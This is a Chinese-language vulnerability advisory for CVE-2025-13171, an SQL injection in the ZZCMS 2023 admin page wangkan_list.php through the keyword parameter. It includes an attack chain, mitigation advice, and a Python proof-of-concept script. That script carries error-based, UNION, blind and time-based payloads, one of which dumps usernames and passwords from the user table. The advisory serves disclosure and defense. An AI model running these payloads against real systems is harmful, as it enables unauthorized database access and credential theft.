CVE-2025-13171 ZZCMS 2023 /admin/wangkan

漏洞信息

漏洞编号

CVE-2025-13171

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ZZCMS 2023

漏洞概述

CVE-2025-13171是ZZCMS 2023版本中存在的一个中等严重性SQL注入漏洞。该漏洞位于管理后台的wangkan_list.php文件中的keyword参数处，攻击者可以通过构造恶意的SQL语句payload来利用此漏洞。由于该漏洞具有远程攻击能力且需要低权限认证，攻击者可以在获取管理员账号后利用此漏洞获取数据库中的敏感信息，包括用户数据、配置信息等。该漏洞的CVSS评分为6.3，属于中危级别，攻击复杂度低，无需用户交互。漏洞的机密性、完整性和可用性影响均为低级别。公开的漏洞利用代码（PoC）已经可用，这增加了该漏洞被恶意利用的风险。建议使用ZZCMS 2023的用户尽快采取防护措施或升级到安全版本。

技术细节

该SQL注入漏洞发生在ZZCMS 2023的管理后台文件/admin/wangkan_list.php中，具体问题在于keyword参数未经过充分的输入验证和过滤就直接拼接到SQL查询语句中。攻击者可以通过GET或POST请求方式向该参数注入恶意构造的SQL语句，利用UNION SELECT、布尔盲注或时间盲注等技术来提取数据库中的敏感信息。由于漏洞位于管理后台，虽然需要认证才能访问，但低权限的管理员账号即可利用此漏洞。攻击者可以利用该漏洞获取数据库版本信息、当前数据库名称、用户表结构及敏感数据，甚至在某些配置下可能实现操作系统命令执行。建议通过预编译语句（Prepared Statements）重写数据库查询逻辑，对keyword参数进行严格的输入验证和过滤，并实施最小权限原则限制数据库账户权限。

攻击链分析

STEP 1

步骤1

攻击者获取ZZCMS 2023的低权限管理员账号（通过钓鱼、弱密码或其他途径）

STEP 2

步骤2

攻击者登录管理后台并访问/admin/wangkan_list.php页面

STEP 3

步骤3

攻击者构造恶意SQL注入payload，通过keyword参数提交到服务器

STEP 4

步骤4

服务器未对keyword参数进行充分过滤，将恶意payload拼接到SQL查询语句中

STEP 5

步骤5

数据库执行恶意SQL语句，攻击者通过UNION、布尔盲注或时间盲注技术提取敏感数据

STEP 6

步骤6

攻击者获取数据库中的用户信息、配置数据或其他敏感内容，可能导致进一步入侵

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13171 PoC - ZZCMS 2023 SQL Injection
# Target: /admin/wangkan_list.php
# Parameter: keyword

target_url = "http://target.com/admin/wangkan_list.php"

# SQL Injection payloads
payloads = [
    # Basic error-based injection
    "test' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    # Union-based injection to extract version
    "test' UNION SELECT 1,2,3,@@version,5,6,7,8,9,10-- -",
    # Boolean-based blind injection
    "test' AND 1=1-- -",
    # Time-based blind injection
    "test'; SLEEP(5)-- -",
    # Extract user table data
    "test' UNION SELECT 1,2,3,GROUP_CONCAT(username,0x3a,password),5,6,7,8,9,10 FROM zzcms_user-- -",
]

def exploit_sqli(url, payload):
    params = {
        'keyword': payload
    }
    try:
        response = requests.get(url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

# Example usage
if __name__ == "__main__":
    print("[*] CVE-2025-13171 SQL Injection PoC")
    print(f"[*] Target: {target_url}")
    
    # Test with basic payload
    result = exploit_sqli(target_url, payloads[0])
    print(f"[+] Response length: {len(result)}")
    print("[*] Check response for database information")

影响范围

ZZCMS 2023 (所有版本)

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 在Web应用层添加输入过滤逻辑，对keyword参数进行SQL关键字过滤；2) 使用Web应用防火墙配置SQL注入防护规则；3) 限制管理后台访问来源，绑定IP白名单；4) 加强对管理员账户的安全管理，使用强密码策略；5) 启用数据库操作日志审计，及时发现异常查询行为；6) 考虑暂时禁用wangkan_list.php功能或设置访问限制。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13171
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13171
3 Details https://www.cvedetails.com/cve/CVE-2025-13171/
4 VulDB https://vuldb.com/cve/CVE-2025-13171
5 Link https://github.com/En0t5/vul/blob/main/zzcms/zzcms-sql-inject2.md
6 Link https://github.com/En0t5/vul/blob/main/zzcms/zzcms-sql-inject2.md#poc
7 Link https://vuldb.com/?ctiid.332463
8 Link https://vuldb.com/?id.332463
9 Link https://vuldb.com/?submit.684765

CVE-2025-13171 ZZCMS 2023 /admin/wangkan_list.php SQL注入漏洞